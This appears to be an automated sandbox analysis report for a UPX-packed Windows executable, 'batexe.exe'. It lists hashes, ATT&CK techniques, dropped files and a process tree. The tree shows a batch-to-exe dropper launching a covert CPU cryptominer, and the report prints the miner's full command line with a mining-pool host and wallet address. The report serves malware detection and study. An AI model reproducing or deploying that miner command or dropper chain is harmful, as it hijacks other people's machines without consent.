73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
301s
max time network
309s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23-02-2024 04:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
952	b2e.exe
4696	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4696	cpuminer-sse2.exe
4696	cpuminer-sse2.exe
4696	cpuminer-sse2.exe
4696	cpuminer-sse2.exe
4696	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/484-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 484 wrote to memory of 952	484	batexe.exe	93
PID 484 wrote to memory of 952	484	batexe.exe	93
PID 484 wrote to memory of 952	484	batexe.exe	93
PID 952 wrote to memory of 3392	952	b2e.exe	94
PID 952 wrote to memory of 3392	952	b2e.exe	94
PID 952 wrote to memory of 3392	952	b2e.exe	94
PID 3392 wrote to memory of 4696	3392	cmd.exe	97
PID 3392 wrote to memory of 4696	3392	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:484
- C:\Users\Admin\AppData\Local\Temp\4B6C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\4B6C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4B6C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5A31.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3392
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4B6C.tmp\b2e.exe

Filesize
3.6MB

MD5
86d925eddb869ad5a56efb06fadd6d15

SHA1
6e9b2bc407730f141563cc9708055322c983b349

SHA256
2f15c9d453944a704e6cc97d3f5c8c8a1f98ce76a8d9ff60b3fee90430673e17

SHA512
3f44386d0916fafb565b744b78d3230af0f8f682a099407d7ce458e92b2e8843628ef8c2179c29bb97a9f885cbd54552d8348eee983bfdeba8a44349f0671c6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\4B6C.tmp\b2e.exe

Filesize
2.1MB

MD5
1bdef8e9ce7f3e628166464711339ace

SHA1
24cee4fa14f77db497819bbb84663119659c5cfe

SHA256
6c44c56b022ac067c272a0854d0b0c0e17ef7ef50989b498b56e7acb3b32727e

SHA512
165a480e0fa5bf7af6a9df32eec7e12c79a38d75d9305bd012bc2e700ec1d57e1a862a162b733b2db7dbae7307e8dbf9cd1bd5698d1d56494a6bed0bbaa506a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\4B6C.tmp\b2e.exe

Filesize
1.9MB

MD5
64b4b118068208dd20b79f80af15437d

SHA1
33bb4ce8a59e7b91de16b5dc5220b0644b4d6a21

SHA256
320e9ebe65b058debb02286d5ef2826588e324209969431c9ac8bda1705f2df3

SHA512
781626bc5ca3e5f6751fc6e2e006d9ad833e42346415b80de7c561299d5caf4437a846a0e1a8d82737944a14235a530b62f987e12c5c3b829858cf7af1bb2877

Download Submit
C:\Users\Admin\AppData\Local\Temp\5A31.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
57KB

MD5
64968247286b64688de0b75553f688bf

SHA1
6f798a947c22dfa41f91d65ad9d87e42d6f7d196

SHA256
4caa70964618e1d2a1778da3bf6bfa1a50d3cfbb61572517e8cf8416b96c65a2

SHA512
a8533d40dbb38fba66b6f3e89c3085d457ce93a98a18f3276b85436f74581a877116fcb35faddd77dd929a6561ecad5209226a013b0dd8f52da82c7fcff944fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1KB

MD5
188a47d70938e27a394a0bc7ecf0369c

SHA1
97eb7cbcdc7fa30dcd99fd3866d5d2ff9e2e36d9

SHA256
7e026af94439b7ce11daaacbe7ea28359476d6a91fcd49ae1eefce611d8bec45

SHA512
166e254351f7aef46a4c1c4630f89992d4d87bb6b5b0f65054fc1c00c52ef44e9f1ab47d19558ad299a2557f6640a7e56c917b5e239ae5e85f2cd50191bde1d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.8MB

MD5
2c0c245e79ef4a18aeeb24dca980b4a9

SHA1
609617535c492ee761807128a774538671227494

SHA256
559dedfa1d45215bd45cb43a238ab562ed1bf6e0f31674abd003ae6060a731df

SHA512
89ddaa69413f1684d464301ecf548499efaa2e5e405eb78aac9adf78f5ecdd29f15b7793569a2af97611bd4de5b8de58301a287c1a0aa6a669108aee2f274881

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.9MB

MD5
c21322ede5bbe3fad0e19a07b95b8485

SHA1
a49c3a437ce6c4aa390f8e58e1e5803207aa6fd7

SHA256
4c69aee2868e78af1e4800198e801d14ac7a7d26bfd07be23b662c461384a0b8

SHA512
e611d41cbd2cbbd23a56b6c952a59487e6960560efc3a866b3eb125d90b045c72fd054cf32af6d1e3de3b1f9b7bd29f9deccc9a4b7f3d847d71ba0e30afe21ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.1MB

MD5
173fdd3d918364561ed54b087a63270a

SHA1
85be7f3a2ba8d650c5a859382299df6effe9b033

SHA256
7dff05f6037d8431a7147898d9358ad1ed79f1456bff58ea971568f8c874a585

SHA512
618ef7fb74c70e7acdd8f53952aacafd20f23e66f87a81a01eb2c62aa1bdec4a17598bfb21c0ad88deb5332854a1ebc33ae1dc11add612eca55f2edff1848d3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/484-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/952-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/952-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4696-47-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/4696-46-0x0000000062560000-0x00000000625F8000-memory.dmp

Filesize
608KB

Download
memory/4696-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4696-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4696-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download